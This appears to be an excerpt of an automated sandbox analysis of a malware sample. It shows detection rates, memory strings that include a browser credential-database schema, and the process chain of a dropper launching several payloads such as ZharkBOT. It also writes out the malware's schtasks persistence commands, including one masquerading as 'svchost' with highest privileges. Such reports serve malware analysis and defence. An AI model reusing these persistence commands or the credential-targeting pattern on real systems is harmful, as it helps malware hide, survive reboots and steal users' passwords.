                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                                Source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                                Source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: aspnet_regiis.exe, 00000014.00000002.2838084537.000000006C28F000.00000002.00000001.01000000.00000017.sdmp, aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: aspnet_regiis.exe, 00000014.00000003.2710989664.0000000023534000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2730606758.0000000023526000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: aspnet_regiis.exe, 00000014.00000002.2824599742.000000001D471000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2837177206.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                Source: ZharkBOT.exe, 0000001D.00000002.3904522113.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000000.3896429472.0000000001060000.00000002.00000001.01000000.0000001D.sdmp, ZharkBOT.exe, 0000001D.00000003.3897920395.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, espartu.exe, 00000020.00000000.3901935044.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000020.00000002.3903141134.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000000.3921843845.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000021.00000002.4375173768.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000000.3993031251.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000022.00000002.4452661019.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000000.4074250002.0000000000A00000.00000002.00000001.01000000.0000001E.sdmp, espartu.exe, 00000027.00000002.4075909460.0000000000A00000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                                Source: mlk3kK6uLZ.exeReversingLabs: Detection: 63%
                                Source: mlk3kK6uLZ.exeVirustotal: Detection: 71%
                                Source: mlk3kK6uLZ.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeFile read: C:\Users\user\Desktop\mlk3kK6uLZ.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\mlk3kK6uLZ.exe "C:\Users\user\Desktop\mlk3kK6uLZ.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe "C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6472 -ip 6472
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 284
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe "C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe"
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe "C:\Users\user\AppData\Roaming\VP2pdCInvS.exe"
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe "C:\Users\user\AppData\Local\Temp\1000202001\hello.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe "C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe "C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeProcess created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe "C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000241001\see.exe "C:\Users\user\AppData\Local\Temp\1000241001\see.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe "C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess created: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe "C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe "C:\Users\user\AppData\Local\Temp\1000202001\hello.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe "C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe "C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe "C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000241001\see.exe "C:\Users\user\AppData\Local\Temp\1000241001\see.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe "C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe "C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe "C:\Users\user\AppData\Roaming\VP2pdCInvS.exe" Jump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6472 -ip 6472Jump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 284Jump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeProcess created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess created: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN espartu.exe /TR "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSection loaded: mswsock.dllJump to behavior
